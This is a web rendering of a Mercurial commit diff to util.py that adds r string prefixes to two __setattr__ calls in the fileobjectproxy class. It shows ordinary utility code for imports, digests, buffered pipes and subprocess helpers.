##// END OF EJS Templates
util: add missing r prefix on some __setattr__ calls...
Augie Fackler -
r36602:f5427483 default
parent child Browse files
Show More
@@ -1,4298 +1,4298 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import io
29 import io
30 import itertools
30 import itertools
31 import mmap
31 import mmap
32 import os
32 import os
33 import platform as pyplatform
33 import platform as pyplatform
34 import re as remod
34 import re as remod
35 import shutil
35 import shutil
36 import signal
36 import signal
37 import socket
37 import socket
38 import stat
38 import stat
39 import string
39 import string
40 import subprocess
40 import subprocess
41 import sys
41 import sys
42 import tempfile
42 import tempfile
43 import textwrap
43 import textwrap
44 import time
44 import time
45 import traceback
45 import traceback
46 import warnings
46 import warnings
47 import zlib
47 import zlib
48
48
49 from . import (
49 from . import (
50 encoding,
50 encoding,
51 error,
51 error,
52 i18n,
52 i18n,
53 node as nodemod,
53 node as nodemod,
54 policy,
54 policy,
55 pycompat,
55 pycompat,
56 urllibcompat,
56 urllibcompat,
57 )
57 )
58
58
59 base85 = policy.importmod(r'base85')
59 base85 = policy.importmod(r'base85')
60 osutil = policy.importmod(r'osutil')
60 osutil = policy.importmod(r'osutil')
61 parsers = policy.importmod(r'parsers')
61 parsers = policy.importmod(r'parsers')
62
62
63 b85decode = base85.b85decode
63 b85decode = base85.b85decode
64 b85encode = base85.b85encode
64 b85encode = base85.b85encode
65
65
66 cookielib = pycompat.cookielib
66 cookielib = pycompat.cookielib
67 empty = pycompat.empty
67 empty = pycompat.empty
68 httplib = pycompat.httplib
68 httplib = pycompat.httplib
69 pickle = pycompat.pickle
69 pickle = pycompat.pickle
70 queue = pycompat.queue
70 queue = pycompat.queue
71 socketserver = pycompat.socketserver
71 socketserver = pycompat.socketserver
72 stderr = pycompat.stderr
72 stderr = pycompat.stderr
73 stdin = pycompat.stdin
73 stdin = pycompat.stdin
74 stdout = pycompat.stdout
74 stdout = pycompat.stdout
75 stringio = pycompat.stringio
75 stringio = pycompat.stringio
76 xmlrpclib = pycompat.xmlrpclib
76 xmlrpclib = pycompat.xmlrpclib
77
77
78 httpserver = urllibcompat.httpserver
78 httpserver = urllibcompat.httpserver
79 urlerr = urllibcompat.urlerr
79 urlerr = urllibcompat.urlerr
80 urlreq = urllibcompat.urlreq
80 urlreq = urllibcompat.urlreq
81
81
82 # workaround for win32mbcs
82 # workaround for win32mbcs
83 _filenamebytestr = pycompat.bytestr
83 _filenamebytestr = pycompat.bytestr
84
84
85 def isatty(fp):
85 def isatty(fp):
86 try:
86 try:
87 return fp.isatty()
87 return fp.isatty()
88 except AttributeError:
88 except AttributeError:
89 return False
89 return False
90
90
91 # glibc determines buffering on first write to stdout - if we replace a TTY
91 # glibc determines buffering on first write to stdout - if we replace a TTY
92 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 # destined stdout with a pipe destined stdout (e.g. pager), we want line
93 # buffering
93 # buffering
94 if isatty(stdout):
94 if isatty(stdout):
95 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
96
96
97 if pycompat.iswindows:
97 if pycompat.iswindows:
98 from . import windows as platform
98 from . import windows as platform
99 stdout = platform.winstdout(stdout)
99 stdout = platform.winstdout(stdout)
100 else:
100 else:
101 from . import posix as platform
101 from . import posix as platform
102
102
103 _ = i18n._
103 _ = i18n._
104
104
105 bindunixsocket = platform.bindunixsocket
105 bindunixsocket = platform.bindunixsocket
106 cachestat = platform.cachestat
106 cachestat = platform.cachestat
107 checkexec = platform.checkexec
107 checkexec = platform.checkexec
108 checklink = platform.checklink
108 checklink = platform.checklink
109 copymode = platform.copymode
109 copymode = platform.copymode
110 executablepath = platform.executablepath
110 executablepath = platform.executablepath
111 expandglobs = platform.expandglobs
111 expandglobs = platform.expandglobs
112 explainexit = platform.explainexit
112 explainexit = platform.explainexit
113 findexe = platform.findexe
113 findexe = platform.findexe
114 getfsmountpoint = platform.getfsmountpoint
114 getfsmountpoint = platform.getfsmountpoint
115 getfstype = platform.getfstype
115 getfstype = platform.getfstype
116 gethgcmd = platform.gethgcmd
116 gethgcmd = platform.gethgcmd
117 getuser = platform.getuser
117 getuser = platform.getuser
118 getpid = os.getpid
118 getpid = os.getpid
119 groupmembers = platform.groupmembers
119 groupmembers = platform.groupmembers
120 groupname = platform.groupname
120 groupname = platform.groupname
121 hidewindow = platform.hidewindow
121 hidewindow = platform.hidewindow
122 isexec = platform.isexec
122 isexec = platform.isexec
123 isowner = platform.isowner
123 isowner = platform.isowner
124 listdir = osutil.listdir
124 listdir = osutil.listdir
125 localpath = platform.localpath
125 localpath = platform.localpath
126 lookupreg = platform.lookupreg
126 lookupreg = platform.lookupreg
127 makedir = platform.makedir
127 makedir = platform.makedir
128 nlinks = platform.nlinks
128 nlinks = platform.nlinks
129 normpath = platform.normpath
129 normpath = platform.normpath
130 normcase = platform.normcase
130 normcase = platform.normcase
131 normcasespec = platform.normcasespec
131 normcasespec = platform.normcasespec
132 normcasefallback = platform.normcasefallback
132 normcasefallback = platform.normcasefallback
133 openhardlinks = platform.openhardlinks
133 openhardlinks = platform.openhardlinks
134 oslink = platform.oslink
134 oslink = platform.oslink
135 parsepatchoutput = platform.parsepatchoutput
135 parsepatchoutput = platform.parsepatchoutput
136 pconvert = platform.pconvert
136 pconvert = platform.pconvert
137 poll = platform.poll
137 poll = platform.poll
138 popen = platform.popen
138 popen = platform.popen
139 posixfile = platform.posixfile
139 posixfile = platform.posixfile
140 quotecommand = platform.quotecommand
140 quotecommand = platform.quotecommand
141 readpipe = platform.readpipe
141 readpipe = platform.readpipe
142 rename = platform.rename
142 rename = platform.rename
143 removedirs = platform.removedirs
143 removedirs = platform.removedirs
144 samedevice = platform.samedevice
144 samedevice = platform.samedevice
145 samefile = platform.samefile
145 samefile = platform.samefile
146 samestat = platform.samestat
146 samestat = platform.samestat
147 setbinary = platform.setbinary
147 setbinary = platform.setbinary
148 setflags = platform.setflags
148 setflags = platform.setflags
149 setsignalhandler = platform.setsignalhandler
149 setsignalhandler = platform.setsignalhandler
150 shellquote = platform.shellquote
150 shellquote = platform.shellquote
151 shellsplit = platform.shellsplit
151 shellsplit = platform.shellsplit
152 spawndetached = platform.spawndetached
152 spawndetached = platform.spawndetached
153 split = platform.split
153 split = platform.split
154 sshargs = platform.sshargs
154 sshargs = platform.sshargs
155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
156 statisexec = platform.statisexec
156 statisexec = platform.statisexec
157 statislink = platform.statislink
157 statislink = platform.statislink
158 testpid = platform.testpid
158 testpid = platform.testpid
159 umask = platform.umask
159 umask = platform.umask
160 unlink = platform.unlink
160 unlink = platform.unlink
161 username = platform.username
161 username = platform.username
162
162
163 try:
163 try:
164 recvfds = osutil.recvfds
164 recvfds = osutil.recvfds
165 except AttributeError:
165 except AttributeError:
166 pass
166 pass
167 try:
167 try:
168 setprocname = osutil.setprocname
168 setprocname = osutil.setprocname
169 except AttributeError:
169 except AttributeError:
170 pass
170 pass
171 try:
171 try:
172 unblocksignal = osutil.unblocksignal
172 unblocksignal = osutil.unblocksignal
173 except AttributeError:
173 except AttributeError:
174 pass
174 pass
175
175
176 # Python compatibility
176 # Python compatibility
177
177
178 _notset = object()
178 _notset = object()
179
179
180 # disable Python's problematic floating point timestamps (issue4836)
180 # disable Python's problematic floating point timestamps (issue4836)
181 # (Python hypocritically says you shouldn't change this behavior in
181 # (Python hypocritically says you shouldn't change this behavior in
182 # libraries, and sure enough Mercurial is not a library.)
182 # libraries, and sure enough Mercurial is not a library.)
183 os.stat_float_times(False)
183 os.stat_float_times(False)
184
184
185 def safehasattr(thing, attr):
185 def safehasattr(thing, attr):
186 return getattr(thing, attr, _notset) is not _notset
186 return getattr(thing, attr, _notset) is not _notset
187
187
188 def _rapply(f, xs):
188 def _rapply(f, xs):
189 if xs is None:
189 if xs is None:
190 # assume None means non-value of optional data
190 # assume None means non-value of optional data
191 return xs
191 return xs
192 if isinstance(xs, (list, set, tuple)):
192 if isinstance(xs, (list, set, tuple)):
193 return type(xs)(_rapply(f, x) for x in xs)
193 return type(xs)(_rapply(f, x) for x in xs)
194 if isinstance(xs, dict):
194 if isinstance(xs, dict):
195 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
196 return f(xs)
196 return f(xs)
197
197
198 def rapply(f, xs):
198 def rapply(f, xs):
199 """Apply function recursively to every item preserving the data structure
199 """Apply function recursively to every item preserving the data structure
200
200
201 >>> def f(x):
201 >>> def f(x):
202 ... return 'f(%s)' % x
202 ... return 'f(%s)' % x
203 >>> rapply(f, None) is None
203 >>> rapply(f, None) is None
204 True
204 True
205 >>> rapply(f, 'a')
205 >>> rapply(f, 'a')
206 'f(a)'
206 'f(a)'
207 >>> rapply(f, {'a'}) == {'f(a)'}
207 >>> rapply(f, {'a'}) == {'f(a)'}
208 True
208 True
209 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
209 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
210 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
210 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
211
211
212 >>> xs = [object()]
212 >>> xs = [object()]
213 >>> rapply(pycompat.identity, xs) is xs
213 >>> rapply(pycompat.identity, xs) is xs
214 True
214 True
215 """
215 """
216 if f is pycompat.identity:
216 if f is pycompat.identity:
217 # fast path mainly for py2
217 # fast path mainly for py2
218 return xs
218 return xs
219 return _rapply(f, xs)
219 return _rapply(f, xs)
220
220
221 def bytesinput(fin, fout, *args, **kwargs):
221 def bytesinput(fin, fout, *args, **kwargs):
222 sin, sout = sys.stdin, sys.stdout
222 sin, sout = sys.stdin, sys.stdout
223 try:
223 try:
224 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
224 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
225 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
225 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
226 finally:
226 finally:
227 sys.stdin, sys.stdout = sin, sout
227 sys.stdin, sys.stdout = sin, sout
228
228
229 def bitsfrom(container):
229 def bitsfrom(container):
230 bits = 0
230 bits = 0
231 for bit in container:
231 for bit in container:
232 bits |= bit
232 bits |= bit
233 return bits
233 return bits
234
234
235 # python 2.6 still have deprecation warning enabled by default. We do not want
235 # python 2.6 still have deprecation warning enabled by default. We do not want
236 # to display anything to standard user so detect if we are running test and
236 # to display anything to standard user so detect if we are running test and
237 # only use python deprecation warning in this case.
237 # only use python deprecation warning in this case.
238 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
238 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
239 if _dowarn:
239 if _dowarn:
240 # explicitly unfilter our warning for python 2.7
240 # explicitly unfilter our warning for python 2.7
241 #
241 #
242 # The option of setting PYTHONWARNINGS in the test runner was investigated.
242 # The option of setting PYTHONWARNINGS in the test runner was investigated.
243 # However, module name set through PYTHONWARNINGS was exactly matched, so
243 # However, module name set through PYTHONWARNINGS was exactly matched, so
244 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
244 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
245 # makes the whole PYTHONWARNINGS thing useless for our usecase.
245 # makes the whole PYTHONWARNINGS thing useless for our usecase.
246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
248 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
248 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
249
249
250 def nouideprecwarn(msg, version, stacklevel=1):
250 def nouideprecwarn(msg, version, stacklevel=1):
251 """Issue an python native deprecation warning
251 """Issue an python native deprecation warning
252
252
253 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
253 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
254 """
254 """
255 if _dowarn:
255 if _dowarn:
256 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
256 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
257 " update your code.)") % version
257 " update your code.)") % version
258 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
258 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
259
259
260 DIGESTS = {
260 DIGESTS = {
261 'md5': hashlib.md5,
261 'md5': hashlib.md5,
262 'sha1': hashlib.sha1,
262 'sha1': hashlib.sha1,
263 'sha512': hashlib.sha512,
263 'sha512': hashlib.sha512,
264 }
264 }
265 # List of digest types from strongest to weakest
265 # List of digest types from strongest to weakest
266 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
266 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
267
267
268 for k in DIGESTS_BY_STRENGTH:
268 for k in DIGESTS_BY_STRENGTH:
269 assert k in DIGESTS
269 assert k in DIGESTS
270
270
271 class digester(object):
271 class digester(object):
272 """helper to compute digests.
272 """helper to compute digests.
273
273
274 This helper can be used to compute one or more digests given their name.
274 This helper can be used to compute one or more digests given their name.
275
275
276 >>> d = digester([b'md5', b'sha1'])
276 >>> d = digester([b'md5', b'sha1'])
277 >>> d.update(b'foo')
277 >>> d.update(b'foo')
278 >>> [k for k in sorted(d)]
278 >>> [k for k in sorted(d)]
279 ['md5', 'sha1']
279 ['md5', 'sha1']
280 >>> d[b'md5']
280 >>> d[b'md5']
281 'acbd18db4cc2f85cedef654fccc4a4d8'
281 'acbd18db4cc2f85cedef654fccc4a4d8'
282 >>> d[b'sha1']
282 >>> d[b'sha1']
283 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
283 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
284 >>> digester.preferred([b'md5', b'sha1'])
284 >>> digester.preferred([b'md5', b'sha1'])
285 'sha1'
285 'sha1'
286 """
286 """
287
287
288 def __init__(self, digests, s=''):
288 def __init__(self, digests, s=''):
289 self._hashes = {}
289 self._hashes = {}
290 for k in digests:
290 for k in digests:
291 if k not in DIGESTS:
291 if k not in DIGESTS:
292 raise Abort(_('unknown digest type: %s') % k)
292 raise Abort(_('unknown digest type: %s') % k)
293 self._hashes[k] = DIGESTS[k]()
293 self._hashes[k] = DIGESTS[k]()
294 if s:
294 if s:
295 self.update(s)
295 self.update(s)
296
296
297 def update(self, data):
297 def update(self, data):
298 for h in self._hashes.values():
298 for h in self._hashes.values():
299 h.update(data)
299 h.update(data)
300
300
301 def __getitem__(self, key):
301 def __getitem__(self, key):
302 if key not in DIGESTS:
302 if key not in DIGESTS:
303 raise Abort(_('unknown digest type: %s') % k)
303 raise Abort(_('unknown digest type: %s') % k)
304 return nodemod.hex(self._hashes[key].digest())
304 return nodemod.hex(self._hashes[key].digest())
305
305
306 def __iter__(self):
306 def __iter__(self):
307 return iter(self._hashes)
307 return iter(self._hashes)
308
308
309 @staticmethod
309 @staticmethod
310 def preferred(supported):
310 def preferred(supported):
311 """returns the strongest digest type in both supported and DIGESTS."""
311 """returns the strongest digest type in both supported and DIGESTS."""
312
312
313 for k in DIGESTS_BY_STRENGTH:
313 for k in DIGESTS_BY_STRENGTH:
314 if k in supported:
314 if k in supported:
315 return k
315 return k
316 return None
316 return None
317
317
318 class digestchecker(object):
318 class digestchecker(object):
319 """file handle wrapper that additionally checks content against a given
319 """file handle wrapper that additionally checks content against a given
320 size and digests.
320 size and digests.
321
321
322 d = digestchecker(fh, size, {'md5': '...'})
322 d = digestchecker(fh, size, {'md5': '...'})
323
323
324 When multiple digests are given, all of them are validated.
324 When multiple digests are given, all of them are validated.
325 """
325 """
326
326
327 def __init__(self, fh, size, digests):
327 def __init__(self, fh, size, digests):
328 self._fh = fh
328 self._fh = fh
329 self._size = size
329 self._size = size
330 self._got = 0
330 self._got = 0
331 self._digests = dict(digests)
331 self._digests = dict(digests)
332 self._digester = digester(self._digests.keys())
332 self._digester = digester(self._digests.keys())
333
333
334 def read(self, length=-1):
334 def read(self, length=-1):
335 content = self._fh.read(length)
335 content = self._fh.read(length)
336 self._digester.update(content)
336 self._digester.update(content)
337 self._got += len(content)
337 self._got += len(content)
338 return content
338 return content
339
339
340 def validate(self):
340 def validate(self):
341 if self._size != self._got:
341 if self._size != self._got:
342 raise Abort(_('size mismatch: expected %d, got %d') %
342 raise Abort(_('size mismatch: expected %d, got %d') %
343 (self._size, self._got))
343 (self._size, self._got))
344 for k, v in self._digests.items():
344 for k, v in self._digests.items():
345 if v != self._digester[k]:
345 if v != self._digester[k]:
346 # i18n: first parameter is a digest name
346 # i18n: first parameter is a digest name
347 raise Abort(_('%s mismatch: expected %s, got %s') %
347 raise Abort(_('%s mismatch: expected %s, got %s') %
348 (k, v, self._digester[k]))
348 (k, v, self._digester[k]))
349
349
350 try:
350 try:
351 buffer = buffer
351 buffer = buffer
352 except NameError:
352 except NameError:
353 def buffer(sliceable, offset=0, length=None):
353 def buffer(sliceable, offset=0, length=None):
354 if length is not None:
354 if length is not None:
355 return memoryview(sliceable)[offset:offset + length]
355 return memoryview(sliceable)[offset:offset + length]
356 return memoryview(sliceable)[offset:]
356 return memoryview(sliceable)[offset:]
357
357
358 closefds = pycompat.isposix
358 closefds = pycompat.isposix
359
359
360 _chunksize = 4096
360 _chunksize = 4096
361
361
362 class bufferedinputpipe(object):
362 class bufferedinputpipe(object):
363 """a manually buffered input pipe
363 """a manually buffered input pipe
364
364
365 Python will not let us use buffered IO and lazy reading with 'polling' at
365 Python will not let us use buffered IO and lazy reading with 'polling' at
366 the same time. We cannot probe the buffer state and select will not detect
366 the same time. We cannot probe the buffer state and select will not detect
367 that data are ready to read if they are already buffered.
367 that data are ready to read if they are already buffered.
368
368
369 This class let us work around that by implementing its own buffering
369 This class let us work around that by implementing its own buffering
370 (allowing efficient readline) while offering a way to know if the buffer is
370 (allowing efficient readline) while offering a way to know if the buffer is
371 empty from the output (allowing collaboration of the buffer with polling).
371 empty from the output (allowing collaboration of the buffer with polling).
372
372
373 This class lives in the 'util' module because it makes use of the 'os'
373 This class lives in the 'util' module because it makes use of the 'os'
374 module from the python stdlib.
374 module from the python stdlib.
375 """
375 """
376 def __new__(cls, fh):
376 def __new__(cls, fh):
377 # If we receive a fileobjectproxy, we need to use a variation of this
377 # If we receive a fileobjectproxy, we need to use a variation of this
378 # class that notifies observers about activity.
378 # class that notifies observers about activity.
379 if isinstance(fh, fileobjectproxy):
379 if isinstance(fh, fileobjectproxy):
380 cls = observedbufferedinputpipe
380 cls = observedbufferedinputpipe
381
381
382 return super(bufferedinputpipe, cls).__new__(cls)
382 return super(bufferedinputpipe, cls).__new__(cls)
383
383
384 def __init__(self, input):
384 def __init__(self, input):
385 self._input = input
385 self._input = input
386 self._buffer = []
386 self._buffer = []
387 self._eof = False
387 self._eof = False
388 self._lenbuf = 0
388 self._lenbuf = 0
389
389
390 @property
390 @property
391 def hasbuffer(self):
391 def hasbuffer(self):
392 """True is any data is currently buffered
392 """True is any data is currently buffered
393
393
394 This will be used externally a pre-step for polling IO. If there is
394 This will be used externally a pre-step for polling IO. If there is
395 already data then no polling should be set in place."""
395 already data then no polling should be set in place."""
396 return bool(self._buffer)
396 return bool(self._buffer)
397
397
398 @property
398 @property
399 def closed(self):
399 def closed(self):
400 return self._input.closed
400 return self._input.closed
401
401
402 def fileno(self):
402 def fileno(self):
403 return self._input.fileno()
403 return self._input.fileno()
404
404
405 def close(self):
405 def close(self):
406 return self._input.close()
406 return self._input.close()
407
407
408 def read(self, size):
408 def read(self, size):
409 while (not self._eof) and (self._lenbuf < size):
409 while (not self._eof) and (self._lenbuf < size):
410 self._fillbuffer()
410 self._fillbuffer()
411 return self._frombuffer(size)
411 return self._frombuffer(size)
412
412
413 def readline(self, *args, **kwargs):
413 def readline(self, *args, **kwargs):
414 if 1 < len(self._buffer):
414 if 1 < len(self._buffer):
415 # this should not happen because both read and readline end with a
415 # this should not happen because both read and readline end with a
416 # _frombuffer call that collapse it.
416 # _frombuffer call that collapse it.
417 self._buffer = [''.join(self._buffer)]
417 self._buffer = [''.join(self._buffer)]
418 self._lenbuf = len(self._buffer[0])
418 self._lenbuf = len(self._buffer[0])
419 lfi = -1
419 lfi = -1
420 if self._buffer:
420 if self._buffer:
421 lfi = self._buffer[-1].find('\n')
421 lfi = self._buffer[-1].find('\n')
422 while (not self._eof) and lfi < 0:
422 while (not self._eof) and lfi < 0:
423 self._fillbuffer()
423 self._fillbuffer()
424 if self._buffer:
424 if self._buffer:
425 lfi = self._buffer[-1].find('\n')
425 lfi = self._buffer[-1].find('\n')
426 size = lfi + 1
426 size = lfi + 1
427 if lfi < 0: # end of file
427 if lfi < 0: # end of file
428 size = self._lenbuf
428 size = self._lenbuf
429 elif 1 < len(self._buffer):
429 elif 1 < len(self._buffer):
430 # we need to take previous chunks into account
430 # we need to take previous chunks into account
431 size += self._lenbuf - len(self._buffer[-1])
431 size += self._lenbuf - len(self._buffer[-1])
432 return self._frombuffer(size)
432 return self._frombuffer(size)
433
433
434 def _frombuffer(self, size):
434 def _frombuffer(self, size):
435 """return at most 'size' data from the buffer
435 """return at most 'size' data from the buffer
436
436
437 The data are removed from the buffer."""
437 The data are removed from the buffer."""
438 if size == 0 or not self._buffer:
438 if size == 0 or not self._buffer:
439 return ''
439 return ''
440 buf = self._buffer[0]
440 buf = self._buffer[0]
441 if 1 < len(self._buffer):
441 if 1 < len(self._buffer):
442 buf = ''.join(self._buffer)
442 buf = ''.join(self._buffer)
443
443
444 data = buf[:size]
444 data = buf[:size]
445 buf = buf[len(data):]
445 buf = buf[len(data):]
446 if buf:
446 if buf:
447 self._buffer = [buf]
447 self._buffer = [buf]
448 self._lenbuf = len(buf)
448 self._lenbuf = len(buf)
449 else:
449 else:
450 self._buffer = []
450 self._buffer = []
451 self._lenbuf = 0
451 self._lenbuf = 0
452 return data
452 return data
453
453
454 def _fillbuffer(self):
454 def _fillbuffer(self):
455 """read data to the buffer"""
455 """read data to the buffer"""
456 data = os.read(self._input.fileno(), _chunksize)
456 data = os.read(self._input.fileno(), _chunksize)
457 if not data:
457 if not data:
458 self._eof = True
458 self._eof = True
459 else:
459 else:
460 self._lenbuf += len(data)
460 self._lenbuf += len(data)
461 self._buffer.append(data)
461 self._buffer.append(data)
462
462
463 return data
463 return data
464
464
465 def mmapread(fp):
465 def mmapread(fp):
466 try:
466 try:
467 fd = getattr(fp, 'fileno', lambda: fp)()
467 fd = getattr(fp, 'fileno', lambda: fp)()
468 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
468 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
469 except ValueError:
469 except ValueError:
470 # Empty files cannot be mmapped, but mmapread should still work. Check
470 # Empty files cannot be mmapped, but mmapread should still work. Check
471 # if the file is empty, and if so, return an empty buffer.
471 # if the file is empty, and if so, return an empty buffer.
472 if os.fstat(fd).st_size == 0:
472 if os.fstat(fd).st_size == 0:
473 return ''
473 return ''
474 raise
474 raise
475
475
476 def popen2(cmd, env=None, newlines=False):
476 def popen2(cmd, env=None, newlines=False):
477 # Setting bufsize to -1 lets the system decide the buffer size.
477 # Setting bufsize to -1 lets the system decide the buffer size.
478 # The default for bufsize is 0, meaning unbuffered. This leads to
478 # The default for bufsize is 0, meaning unbuffered. This leads to
479 # poor performance on Mac OS X: http://bugs.python.org/issue4194
479 # poor performance on Mac OS X: http://bugs.python.org/issue4194
480 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
480 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
481 close_fds=closefds,
481 close_fds=closefds,
482 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
482 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
483 universal_newlines=newlines,
483 universal_newlines=newlines,
484 env=env)
484 env=env)
485 return p.stdin, p.stdout
485 return p.stdin, p.stdout
486
486
487 def popen3(cmd, env=None, newlines=False):
487 def popen3(cmd, env=None, newlines=False):
488 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
488 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
489 return stdin, stdout, stderr
489 return stdin, stdout, stderr
490
490
491 def popen4(cmd, env=None, newlines=False, bufsize=-1):
491 def popen4(cmd, env=None, newlines=False, bufsize=-1):
492 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
492 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
493 close_fds=closefds,
493 close_fds=closefds,
494 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
494 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
495 stderr=subprocess.PIPE,
495 stderr=subprocess.PIPE,
496 universal_newlines=newlines,
496 universal_newlines=newlines,
497 env=env)
497 env=env)
498 return p.stdin, p.stdout, p.stderr, p
498 return p.stdin, p.stdout, p.stderr, p
499
499
500 class fileobjectproxy(object):
500 class fileobjectproxy(object):
501 """A proxy around file objects that tells a watcher when events occur.
501 """A proxy around file objects that tells a watcher when events occur.
502
502
503 This type is intended to only be used for testing purposes. Think hard
503 This type is intended to only be used for testing purposes. Think hard
504 before using it in important code.
504 before using it in important code.
505 """
505 """
506 __slots__ = (
506 __slots__ = (
507 r'_orig',
507 r'_orig',
508 r'_observer',
508 r'_observer',
509 )
509 )
510
510
511 def __init__(self, fh, observer):
511 def __init__(self, fh, observer):
512 object.__setattr__(self, '_orig', fh)
512 object.__setattr__(self, r'_orig', fh)
513 object.__setattr__(self, '_observer', observer)
513 object.__setattr__(self, r'_observer', observer)
514
514
515 def __getattribute__(self, name):
515 def __getattribute__(self, name):
516 ours = {
516 ours = {
517 r'_observer',
517 r'_observer',
518
518
519 # IOBase
519 # IOBase
520 r'close',
520 r'close',
521 # closed if a property
521 # closed if a property
522 r'fileno',
522 r'fileno',
523 r'flush',
523 r'flush',
524 r'isatty',
524 r'isatty',
525 r'readable',
525 r'readable',
526 r'readline',
526 r'readline',
527 r'readlines',
527 r'readlines',
528 r'seek',
528 r'seek',
529 r'seekable',
529 r'seekable',
530 r'tell',
530 r'tell',
531 r'truncate',
531 r'truncate',
532 r'writable',
532 r'writable',
533 r'writelines',
533 r'writelines',
534 # RawIOBase
534 # RawIOBase
535 r'read',
535 r'read',
536 r'readall',
536 r'readall',
537 r'readinto',
537 r'readinto',
538 r'write',
538 r'write',
539 # BufferedIOBase
539 # BufferedIOBase
540 # raw is a property
540 # raw is a property
541 r'detach',
541 r'detach',
542 # read defined above
542 # read defined above
543 r'read1',
543 r'read1',
544 # readinto defined above
544 # readinto defined above
545 # write defined above
545 # write defined above
546 }
546 }
547
547
548 # We only observe some methods.
548 # We only observe some methods.
549 if name in ours:
549 if name in ours:
550 return object.__getattribute__(self, name)
550 return object.__getattribute__(self, name)
551
551
552 return getattr(object.__getattribute__(self, r'_orig'), name)
552 return getattr(object.__getattribute__(self, r'_orig'), name)
553
553
554 def __delattr__(self, name):
554 def __delattr__(self, name):
555 return delattr(object.__getattribute__(self, r'_orig'), name)
555 return delattr(object.__getattribute__(self, r'_orig'), name)
556
556
557 def __setattr__(self, name, value):
557 def __setattr__(self, name, value):
558 return setattr(object.__getattribute__(self, r'_orig'), name, value)
558 return setattr(object.__getattribute__(self, r'_orig'), name, value)
559
559
560 def __iter__(self):
560 def __iter__(self):
561 return object.__getattribute__(self, r'_orig').__iter__()
561 return object.__getattribute__(self, r'_orig').__iter__()
562
562
563 def _observedcall(self, name, *args, **kwargs):
563 def _observedcall(self, name, *args, **kwargs):
564 # Call the original object.
564 # Call the original object.
565 orig = object.__getattribute__(self, r'_orig')
565 orig = object.__getattribute__(self, r'_orig')
566 res = getattr(orig, name)(*args, **kwargs)
566 res = getattr(orig, name)(*args, **kwargs)
567
567
568 # Call a method on the observer of the same name with arguments
568 # Call a method on the observer of the same name with arguments
569 # so it can react, log, etc.
569 # so it can react, log, etc.
570 observer = object.__getattribute__(self, r'_observer')
570 observer = object.__getattribute__(self, r'_observer')
571 fn = getattr(observer, name, None)
571 fn = getattr(observer, name, None)
572 if fn:
572 if fn:
573 fn(res, *args, **kwargs)
573 fn(res, *args, **kwargs)
574
574
575 return res
